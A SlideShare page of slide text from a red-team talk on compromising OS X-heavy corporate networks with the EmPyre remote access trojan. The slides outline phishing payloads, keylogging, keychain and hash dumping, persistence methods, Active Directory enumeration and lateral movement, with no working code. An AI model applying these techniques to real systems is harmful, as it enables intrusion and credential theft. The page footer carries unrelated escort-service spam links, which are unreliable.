SlideShare a Scribd company logo

External to DA, the OS X Way

Download as PPTX, PDF
S
Stephan Borosh

The document provides an overview of techniques for penetrating OS X environments externally, including using the EmPyre remote access Trojan, phishing with OS X payloads, privilege escalation, persistence mechanisms like login hooks and crontab, host and network reconnaissance tools, and lateral movement options like SSH. The challenges of operating in an OS X environment and adapting typical Windows tactics are also discussed.

Internet
1 of 44
External to DA, the OS X Way Operating in an OS X-heavy environment
Contents  Introduction  Overview  Tradecraft Preparation  Challenges  The Agent  Phishing  Situational Awareness: Host Enumeration  Privilege Escalation  Persistence  Situational Awareness: Network and User Enumeration  Lateral Movement
Introductions  Alex Rymdeko-Harvey is a previous US Army Solider that recently transitioned and currently works at the Adaptive Threat Division at Veris Group as a Penetration Tester and Red Teamer. Alex has a wide range of skills and experience from offensive and defensive operations taking place in today's security surface.  Steve Borosh is a long-time security enthusiast. Prior: U.S. Army Infantry Combat Veteran and private security contractor. Currently working as a Penetration Tester, Red Teamer and Instructor with Veris Group’s Adaptive Threat Division. Steve enjoys bug hunting, building useful security tools and teaching.
Overview • Typical penetration tests cover Windows / Linux • Assessments become mundane • Client approaches with a large OS X user-base • Use common methodologies with new tools and techniques adapted for OS X • Utilize EmPyre, a Remote Access Trojan based of of the Empire framework
Adversarial Use • WireLurker (Trojanized applications, Infects connected ios devices) • XcodeGhost (Infected xcode package in China) • Hacking Team (Remote Code Systems compromise platform) • OceanLotus (Flash Dropper, Download Mach-O binary) • KeRanger (Ransomware, Infected transmission package)
The Scenario • A client requests an external penetration test against their corporate infrastructure. • Phishing with payloads may be conducted with email addresses harvested from publicly available sources. • 90% of users utilize OS X with several developers using Windows
Scenario: Goals • Phish OS X users • Elevate local privileges • Move Laterally if needed • Gain control of the Active Directory domain
Tradecraft Preparation • Planning and Preparation • Right tools for the job • Live off the land • pbpaste • screencapture • Native vs Non-Native • Methodology • Reconnaissance • Exploitation (gain access) • Sitiuational Awareness • Escalate Privileges • Establish Persistence • Lateral Movement Gain Access Situational Awareness Escalate Privileges Establish Persistence Lateral Movement
Challenges  Limited information on operating in OS X environments  No open-sourced asynchronous Remote Access Trojan (RAT)  Lateral Spread  OS X/Linux  Windows  Less phishing payloads available  No OLE  Less executable types
The Agent: EmPyre
The Agent: EmPyre  Remote Access Trojan (RAT)  Python (core developed by @harmj0y) based on the Empire project  Asynchronous / C2  Secure Diffie-Hellman exchange communications  Post-Exploitation modules  OS X/Linux  Launcher detects Little Snitch
The Agent: EmPyre  The Diffie Hellman implementation is from Mark Loiseau's project at https://github.com/lowazo/pyDHE, licensed under version 3.0 of the GNU General Public License.  The AES implementation is adapted from Richard Moore's project at https://github.com/ricmoo/pyaes, licensed under the MIT license.
Phishing  Previous Tradecraft  Browser Exploits  Java Payloads  OLE Documents  Macro Payloads
Phishing: Payload Generation  2015-7007 HTML Applescript launcher  OS X Microsoft Office Macro  Supports 2011  2016 = “Sandbox”
Payload Generation
Situational Awareness: Host  Previous Tradecraft  PowerShell  WMI  PowerUp  Cobalt Strike Beacon modules  Meterpreter modules  The core of knowing your land  How do we priv-esc?
Situational Awareness: Host  Keylog  Keychain Dump  Clipboard Monitoring  Scrape Messages  Hash Dump  Browser Dump
Situational Awareness: Keylogging  Elevated Context  Vital portion of our tradecraft  post exploitation
Situational Awareness: Clipboard Monitoring  Non-Native method  Native pbpaste may be signatured by Carbon Black  Out to file
Situational Awareness: Keychain Dump  Cleartext Keychain Dump  Versions Prior to OS X El Capitan Inspired / Adapted from Juuso: https://github.com/juuso /keychaindump
Situational Awareness: Search Messages  Scrapes Message.app DB  iMessage, Jabber, Google Talk, Yahoo, AIM  Enumerate X messages  Account  Service  Number  message
Situational Awareness: Hashdump  Local Hashes  Hashcat format ready!
Situational Awareness: Browser Dump  Dump Chrome  Dump Safari  Specify length of output
Privilege Escalation  Sudo Spawn
Persistence  Previous Tradecraft  Windows  Registry  Startup Folders  WMI  DLL Hijack  Net user /add  Linux  Crontab  adduser
Persistence  Login Hooks  Login persistence  Crontab  Hourly persistence  LaunchDaemon  Reboot persistence  DyLib Hijacking  Application start persistence
Persistence: Login Hook - User Context Persistence  Mac Login Hooks  Bash / Applescript execution  Accessible to all users  Uses “Defaults” tool  Sets com.apple.loginwindow LoginHook
Persistence: Crontab  Set persistence by time  Requires file on disk
Persistence: Launch Daemon  Requires Sudo  Spawns on reboot  Spawns on agent loss
Persistence: Dylib Hijacking  Hijack Scanner Module  Based on @patrickwardle research
Persistence: Dylib Hijacking  Hijacked Xcode
Situational Awareness: Network  Previous Tradecraft  Arp  Nmap  Net Commands  EyeWitness  PowerView
Situational Awareness: Network  Group Policy Preferences  Active Directory Queries  Port Scanning  Web Discovery
Situational Awareness: Active Directory Modules  situational_awareness/network/active_directory/get_computers  situational_awareness/network/active_directory/get_domaincontrollers  situational_awareness/network/active_directory/get_fileservers  situational_awareness/network/active_directory/get_groupmembers  situational_awareness/network/active_directory/get_groupmemberships  situational_awareness/network/active_directory/get_groups  situational_awareness/network/active_directory/get_ous  situational_awareness/network/active_directory/get_userinformation  situational_awareness/network/active_directory/get_users
Situational Awareness: GPP  Group Policy Preferences  Pulls “Encrypted” passwords from SYSVOL  MS14-025 https://raw.githubusercontent.com/leonteale/pentestpackage/master/Gpprefdecrypt.py
Situational Awareness: Finding the Domain Controller
Situational Awareness: LDAP Queries  Utilizes LDAP queries to pull objects such as computers, users, groups and more from Active Directory.
Situational Awareness: Web Services  find_fruit module  Checks for possible vulnerable web applications  Tomcat  jboss  idrac  Apache Axis2  etc..
Lateral Movement  Previous Tradecraft  Linux  SSH  Telnet  Exploitation  Windows  PSEXEC  WMI  Exploitation  RDP
Lateral Movement  Windows  Pivot to “Empire”  Exploit Web Services
Lateral Movement  Linux/OS X  SSH Commands  SSH Launcher
Honorable Mention: REST API  EmPyre implements the same RESTful API specification as Empire  https://github.com/PowerShellEmpire/Empire/wiki/RESTful-API  External users/projects can fully control an EmPyre server in a predictable way REST requests  This opens the possibility for web front ends, Android apps, multi- player CLI UIs, and more
What’s next  Socks Proxy  Community Modules  More Exploitation Modules  Merge with Empire Thanks to @harmj0y, @xorrior, @CptJesus for their contributions to this effort!

Recommended

PowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingPowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingNikhil Mittal
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemRoss Wolf
 
DerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedWill Schroeder
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationshipn|u - The Open Security Community
 
Red Team Methodology - A Naked Look
Red Team Methodology - A Naked LookRed Team Methodology - A Naked Look
Red Team Methodology - A Naked LookJason Lang
 
Pwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShellPwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShellBeau Bullock
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodologybugcrowd
 
Leveraging MITRE ATT&CK - Speaking the Common Language
Leveraging MITRE ATT&CK - Speaking the Common LanguageLeveraging MITRE ATT&CK - Speaking the Common Language
Leveraging MITRE ATT&CK - Speaking the Common LanguageErik Van Buggenhout
 

Recommended

PowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingPowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingNikhil Mittal
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemRoss Wolf
 
DerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedWill Schroeder
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationshipn|u - The Open Security Community
 
Red Team Methodology - A Naked Look
Red Team Methodology - A Naked LookRed Team Methodology - A Naked Look
Red Team Methodology - A Naked LookJason Lang
 
Pwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShellPwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShellBeau Bullock
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodologybugcrowd
 
Leveraging MITRE ATT&CK - Speaking the Common Language
Leveraging MITRE ATT&CK - Speaking the Common LanguageLeveraging MITRE ATT&CK - Speaking the Common Language
Leveraging MITRE ATT&CK - Speaking the Common LanguageErik Van Buggenhout
 
aclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundDirkjanMollema
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentTeymur Kheirkhabarov
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryWill Schroeder
 
Threat Hunting with Splunk
Threat Hunting with SplunkThreat Hunting with Splunk
Threat Hunting with SplunkSplunk
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionVishal Kumar
 
Azure Penetration Testing
Azure Penetration TestingAzure Penetration Testing
Azure Penetration TestingCheah Eng Soon
 
Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules CoverageSunny Neo
 
0wn-premises: Bypassing Microsoft Defender for Identity
0wn-premises: Bypassing Microsoft Defender for Identity0wn-premises: Bypassing Microsoft Defender for Identity
0wn-premises: Bypassing Microsoft Defender for IdentityNikhil Mittal
 
Trusts You Might Have Missed
Trusts You Might Have MissedTrusts You Might Have Missed
Trusts You Might Have MissedWill Schroeder
 
PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)Will Schroeder
 
Bsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingBsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingDhruv Majumdar
 
Offensive PowerShell Cheat Sheet
Offensive PowerShell Cheat SheetOffensive PowerShell Cheat Sheet
Offensive PowerShell Cheat SheetRahmat Nurfauzi
 
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItAMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItNikhil Mittal
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureSergey Soldatov
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentTeymur Kheirkhabarov
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter HimselfSergey Soldatov
 
Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]RootedCON
 
Secure code practices
Secure code practicesSecure code practices
Secure code practicesHina Rawal
 
Cyber Threat Hunting Workshop
Cyber Threat Hunting WorkshopCyber Threat Hunting Workshop
Cyber Threat Hunting WorkshopDigit Oktavianto
 
RACE - Minimal Rights and ACE for Active Directory Dominance
RACE - Minimal Rights and ACE for Active Directory DominanceRACE - Minimal Rights and ACE for Active Directory Dominance
RACE - Minimal Rights and ACE for Active Directory DominanceNikhil Mittal
 
Stuxnet redux. malware attribution & lessons learned
Stuxnet redux. malware attribution & lessons learnedStuxnet redux. malware attribution & lessons learned
Stuxnet redux. malware attribution & lessons learnedYury Chemerkin
 
Operational Security Intelligence
Operational Security IntelligenceOperational Security Intelligence
Operational Security IntelligenceSplunk
 

More Related Content

What's hot

aclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundDirkjanMollema
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentTeymur Kheirkhabarov
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryWill Schroeder
 
Threat Hunting with Splunk
Threat Hunting with SplunkThreat Hunting with Splunk
Threat Hunting with SplunkSplunk
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionVishal Kumar
 
Azure Penetration Testing
Azure Penetration TestingAzure Penetration Testing
Azure Penetration TestingCheah Eng Soon
 
Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules CoverageSunny Neo
 
0wn-premises: Bypassing Microsoft Defender for Identity
0wn-premises: Bypassing Microsoft Defender for Identity0wn-premises: Bypassing Microsoft Defender for Identity
0wn-premises: Bypassing Microsoft Defender for IdentityNikhil Mittal
 
Trusts You Might Have Missed
Trusts You Might Have MissedTrusts You Might Have Missed
Trusts You Might Have MissedWill Schroeder
 
PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)Will Schroeder
 
Bsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingBsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingDhruv Majumdar
 
Offensive PowerShell Cheat Sheet
Offensive PowerShell Cheat SheetOffensive PowerShell Cheat Sheet
Offensive PowerShell Cheat SheetRahmat Nurfauzi
 
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItAMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItNikhil Mittal
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureSergey Soldatov
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentTeymur Kheirkhabarov
 
Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]RootedCON
 
Secure code practices
Secure code practicesSecure code practices
Secure code practicesHina Rawal
 
Cyber Threat Hunting Workshop
Cyber Threat Hunting WorkshopCyber Threat Hunting Workshop
Cyber Threat Hunting WorkshopDigit Oktavianto
 
RACE - Minimal Rights and ACE for Active Directory Dominance
RACE - Minimal Rights and ACE for Active Directory DominanceRACE - Minimal Rights and ACE for Active Directory Dominance
RACE - Minimal Rights and ACE for Active Directory DominanceNikhil Mittal
 

What's hot (20)

aclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHound
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows Environment
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active Directory
 
Threat Hunting with Splunk
Threat Hunting with SplunkThreat Hunting with Splunk
Threat Hunting with Splunk
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
 
Azure Penetration Testing
Azure Penetration TestingAzure Penetration Testing
Azure Penetration Testing
 
Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules Coverage
 
0wn-premises: Bypassing Microsoft Defender for Identity
0wn-premises: Bypassing Microsoft Defender for Identity0wn-premises: Bypassing Microsoft Defender for Identity
0wn-premises: Bypassing Microsoft Defender for Identity
 
Trusts You Might Have Missed
Trusts You Might Have MissedTrusts You Might Have Missed
Trusts You Might Have Missed
 
PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)
 
Bsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingBsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat Hunting
 
Offensive PowerShell Cheat Sheet
Offensive PowerShell Cheat SheetOffensive PowerShell Cheat Sheet
Offensive PowerShell Cheat Sheet
 
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItAMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows Environment
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
 
Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]
 
Secure code practices
Secure code practicesSecure code practices
Secure code practices
 
Cyber Threat Hunting Workshop
Cyber Threat Hunting WorkshopCyber Threat Hunting Workshop
Cyber Threat Hunting Workshop
 
RACE - Minimal Rights and ACE for Active Directory Dominance
RACE - Minimal Rights and ACE for Active Directory DominanceRACE - Minimal Rights and ACE for Active Directory Dominance
RACE - Minimal Rights and ACE for Active Directory Dominance
 

Similar to External to DA, the OS X Way

Stuxnet redux. malware attribution & lessons learned
Stuxnet redux. malware attribution & lessons learnedStuxnet redux. malware attribution & lessons learned
Stuxnet redux. malware attribution & lessons learnedYury Chemerkin
 
Operational Security Intelligence
Operational Security IntelligenceOperational Security Intelligence
Operational Security IntelligenceSplunk
 
WTF is Penetration Testing v.2
WTF is Penetration Testing v.2WTF is Penetration Testing v.2
WTF is Penetration Testing v.2Scott Sutherland
 
Big problems with big data – Hadoop interfaces security
Big problems with big data – Hadoop interfaces securityBig problems with big data – Hadoop interfaces security
Big problems with big data – Hadoop interfaces securitySecuRing
 
Zeronights 2015 - Big problems with big data - Hadoop interfaces security
Zeronights 2015 - Big problems with big data - Hadoop interfaces securityZeronights 2015 - Big problems with big data - Hadoop interfaces security
Zeronights 2015 - Big problems with big data - Hadoop interfaces securityJakub Kałużny
 
The How and Why of Container Vulnerability Management
The How and Why of Container Vulnerability ManagementThe How and Why of Container Vulnerability Management
The How and Why of Container Vulnerability ManagementTim Mackey
 
The How and Why of Container Vulnerability Management
The How and Why of Container Vulnerability ManagementThe How and Why of Container Vulnerability Management
The How and Why of Container Vulnerability ManagementBlack Duck by Synopsys
 
Threats, Threat Modeling and Analysis
Threats, Threat Modeling and AnalysisThreats, Threat Modeling and Analysis
Threats, Threat Modeling and AnalysisIan G
 
Detection of webshells in compromised perimeter assets using ML algorithms
Detection of webshells in compromised perimeter assets using ML algorithms Detection of webshells in compromised perimeter assets using ML algorithms
Detection of webshells in compromised perimeter assets using ML algorithms Rod Soto
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseScott Sutherland
 
Keeping Up with the Adversary: Creating a Threat-Based Cyber Team
Keeping Up with the Adversary: Creating a Threat-Based Cyber TeamKeeping Up with the Adversary: Creating a Threat-Based Cyber Team
Keeping Up with the Adversary: Creating a Threat-Based Cyber TeamPriyanka Aash
 
Open Source Security Tools for Big Data
Open Source Security Tools for Big DataOpen Source Security Tools for Big Data
Open Source Security Tools for Big DataRommel Garcia
 
Open Source Security Tools for Big Data
Open Source Security Tools for Big DataOpen Source Security Tools for Big Data
Open Source Security Tools for Big DataGreat Wide Open
 
Red Team: Emulating Advanced Adversaries in Cyberspace
Red Team: Emulating Advanced Adversaries in CyberspaceRed Team: Emulating Advanced Adversaries in Cyberspace
Red Team: Emulating Advanced Adversaries in CyberspaceDon Anto
 
Secure Application Development in the Age of Continuous Delivery
Secure Application Development in the Age of Continuous DeliverySecure Application Development in the Age of Continuous Delivery
Secure Application Development in the Age of Continuous DeliveryBlack Duck by Synopsys
 
Secure Application Development in the Age of Continuous Delivery
Secure Application Development in the Age of Continuous DeliverySecure Application Development in the Age of Continuous Delivery
Secure Application Development in the Age of Continuous DeliveryTim Mackey
 
[CONFidence 2016] Jakub Kałużny, Mateusz Olejarka - Big problems with big dat...
[CONFidence 2016] Jakub Kałużny, Mateusz Olejarka - Big problems with big dat...[CONFidence 2016] Jakub Kałużny, Mateusz Olejarka - Big problems with big dat...
[CONFidence 2016] Jakub Kałużny, Mateusz Olejarka - Big problems with big dat...PROIDEA
 
Pro Tips for Power Users – Palo Alto Networks Live Community and Fuel User Gr...
Pro Tips for Power Users – Palo Alto Networks Live Community and Fuel User Gr...Pro Tips for Power Users – Palo Alto Networks Live Community and Fuel User Gr...
Pro Tips for Power Users – Palo Alto Networks Live Community and Fuel User Gr...PaloAltoNetworks
 
Basic Malware Analysis
Basic Malware AnalysisBasic Malware Analysis
Basic Malware AnalysisAlbert Hui
 
Android application security testing
Android application security testingAndroid application security testing
Android application security testingMykhailo Antonishyn
 

Similar to External to DA, the OS X Way (20)

Stuxnet redux. malware attribution & lessons learned
Stuxnet redux. malware attribution & lessons learnedStuxnet redux. malware attribution & lessons learned
Stuxnet redux. malware attribution & lessons learned
 
Operational Security Intelligence
Operational Security IntelligenceOperational Security Intelligence
Operational Security Intelligence
 
WTF is Penetration Testing v.2
WTF is Penetration Testing v.2WTF is Penetration Testing v.2
WTF is Penetration Testing v.2
 
Big problems with big data – Hadoop interfaces security
Big problems with big data – Hadoop interfaces securityBig problems with big data – Hadoop interfaces security
Big problems with big data – Hadoop interfaces security
 
Zeronights 2015 - Big problems with big data - Hadoop interfaces security
Zeronights 2015 - Big problems with big data - Hadoop interfaces securityZeronights 2015 - Big problems with big data - Hadoop interfaces security
Zeronights 2015 - Big problems with big data - Hadoop interfaces security
 
The How and Why of Container Vulnerability Management
The How and Why of Container Vulnerability ManagementThe How and Why of Container Vulnerability Management
The How and Why of Container Vulnerability Management
 
The How and Why of Container Vulnerability Management
The How and Why of Container Vulnerability ManagementThe How and Why of Container Vulnerability Management
The How and Why of Container Vulnerability Management
 
Threats, Threat Modeling and Analysis
Threats, Threat Modeling and AnalysisThreats, Threat Modeling and Analysis
Threats, Threat Modeling and Analysis
 
Detection of webshells in compromised perimeter assets using ML algorithms
Detection of webshells in compromised perimeter assets using ML algorithms Detection of webshells in compromised perimeter assets using ML algorithms
Detection of webshells in compromised perimeter assets using ML algorithms
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash Course
 
Keeping Up with the Adversary: Creating a Threat-Based Cyber Team
Keeping Up with the Adversary: Creating a Threat-Based Cyber TeamKeeping Up with the Adversary: Creating a Threat-Based Cyber Team
Keeping Up with the Adversary: Creating a Threat-Based Cyber Team
 
Open Source Security Tools for Big Data
Open Source Security Tools for Big DataOpen Source Security Tools for Big Data
Open Source Security Tools for Big Data
 
Open Source Security Tools for Big Data
Open Source Security Tools for Big DataOpen Source Security Tools for Big Data
Open Source Security Tools for Big Data
 
Red Team: Emulating Advanced Adversaries in Cyberspace
Red Team: Emulating Advanced Adversaries in CyberspaceRed Team: Emulating Advanced Adversaries in Cyberspace
Red Team: Emulating Advanced Adversaries in Cyberspace
 
Secure Application Development in the Age of Continuous Delivery
Secure Application Development in the Age of Continuous DeliverySecure Application Development in the Age of Continuous Delivery
Secure Application Development in the Age of Continuous Delivery
 
Secure Application Development in the Age of Continuous Delivery
Secure Application Development in the Age of Continuous DeliverySecure Application Development in the Age of Continuous Delivery
Secure Application Development in the Age of Continuous Delivery
 
[CONFidence 2016] Jakub Kałużny, Mateusz Olejarka - Big problems with big dat...
[CONFidence 2016] Jakub Kałużny, Mateusz Olejarka - Big problems with big dat...[CONFidence 2016] Jakub Kałużny, Mateusz Olejarka - Big problems with big dat...
[CONFidence 2016] Jakub Kałużny, Mateusz Olejarka - Big problems with big dat...
 
Pro Tips for Power Users – Palo Alto Networks Live Community and Fuel User Gr...
Pro Tips for Power Users – Palo Alto Networks Live Community and Fuel User Gr...Pro Tips for Power Users – Palo Alto Networks Live Community and Fuel User Gr...
Pro Tips for Power Users – Palo Alto Networks Live Community and Fuel User Gr...
 
Basic Malware Analysis
Basic Malware AnalysisBasic Malware Analysis
Basic Malware Analysis
 
Android application security testing
Android application security testingAndroid application security testing
Android application security testing
 

Recently uploaded

APNIC Updates presented by Paul Wilson at ARIN 53
APNIC Updates presented by Paul Wilson at ARIN 53APNIC Updates presented by Paul Wilson at ARIN 53
APNIC Updates presented by Paul Wilson at ARIN 53APNIC
 
VIP Call Girls Pollachi 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Pollachi 7001035870 Whatsapp Number, 24/07 BookingVIP Call Girls Pollachi 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Pollachi 7001035870 Whatsapp Number, 24/07 Bookingdharasingh5698
 
20240509 QFM015 Engineering Leadership Reading List April 2024.pdf
20240509 QFM015 Engineering Leadership Reading List April 2024.pdf20240509 QFM015 Engineering Leadership Reading List April 2024.pdf
20240509 QFM015 Engineering Leadership Reading List April 2024.pdfMatthew Sinclair
 
在线制作约克大学毕业证(yu毕业证)在读证明认证可查
在线制作约克大学毕业证(yu毕业证)在读证明认证可查在线制作约克大学毕业证(yu毕业证)在读证明认证可查
在线制作约克大学毕业证(yu毕业证)在读证明认证可查ydyuyu
 
( Pune ) VIP Baner Call Girls 🎗️ 9352988975 Sizzling | Escorts | Girls Are Re...
( Pune ) VIP Baner Call Girls 🎗️ 9352988975 Sizzling | Escorts | Girls Are Re...( Pune ) VIP Baner Call Girls 🎗️ 9352988975 Sizzling | Escorts | Girls Are Re...
( Pune ) VIP Baner Call Girls 🎗️ 9352988975 Sizzling | Escorts | Girls Are Re...nilamkumrai
 
Yerawada ] Independent Escorts in Pune - Book 8005736733 Call Girls Available...
Yerawada ] Independent Escorts in Pune - Book 8005736733 Call Girls Available...Yerawada ] Independent Escorts in Pune - Book 8005736733 Call Girls Available...
Yerawada ] Independent Escorts in Pune - Book 8005736733 Call Girls Available...SUHANI PANDEY
 
➥🔝 7737669865 🔝▻ mehsana Call-girls in Women Seeking Men 🔝mehsana🔝 Escorts...
➥🔝 7737669865 🔝▻ mehsana Call-girls in Women Seeking Men 🔝mehsana🔝 Escorts...➥🔝 7737669865 🔝▻ mehsana Call-girls in Women Seeking Men 🔝mehsana🔝 Escorts...
➥🔝 7737669865 🔝▻ mehsana Call-girls in Women Seeking Men 🔝mehsana🔝 Escorts...nirzagarg
 
20240508 QFM014 Elixir Reading List April 2024.pdf
20240508 QFM014 Elixir Reading List April 2024.pdf20240508 QFM014 Elixir Reading List April 2024.pdf
20240508 QFM014 Elixir Reading List April 2024.pdfMatthew Sinclair
 
All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445
All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445
All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445ruhi
 
VIP Model Call Girls NIBM ( Pune ) Call ON 8005736733 Starting From 5K to 25K...
VIP Model Call Girls NIBM ( Pune ) Call ON 8005736733 Starting From 5K to 25K...VIP Model Call Girls NIBM ( Pune ) Call ON 8005736733 Starting From 5K to 25K...
